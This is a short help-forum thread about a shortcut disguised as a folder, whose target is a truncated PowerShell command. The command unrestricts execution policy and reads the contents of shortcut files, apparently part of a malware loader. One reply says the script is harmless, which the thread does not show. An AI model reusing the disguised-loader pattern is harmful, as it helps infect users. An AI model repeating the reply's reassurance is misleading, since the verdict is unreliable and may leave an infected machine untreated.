[Gumby©]

I recently was helping a friend with her computer and came across a script posing as a folder. It was this:

 

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted function IJ($A) {$L = $Null;Get-ChildItem $A -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$Hu = [String](Get-Content $_.FullName);$

 

Anyone know what this does? Is it dangerous if clicked? If so, can it be reversed? Thanks for you time.

[Advertisements]

Have you run a scan with the default antivirus?

[DR M]

Have you run a scan with the default antivirus?

[Gumby©]

Yes and nothing came up. Still wondering what it does.

[zep516]

Hello Gumby@

 

"It's only part of a script.

 

The code sets the Execution   policy to Unrestricted (not good)

 

It then iterates through supposedly a folder passed to the function of all shortcuts in that folder

 

and copies the contents of each shortcut.

 

It's useless without parameters being passed to it."

[Gumby©]

Thanks zep516. Glad to know it did nothing.

[zep516]

You're welcome.

 

I actually had to get some help from someone and just conveyed his information to you .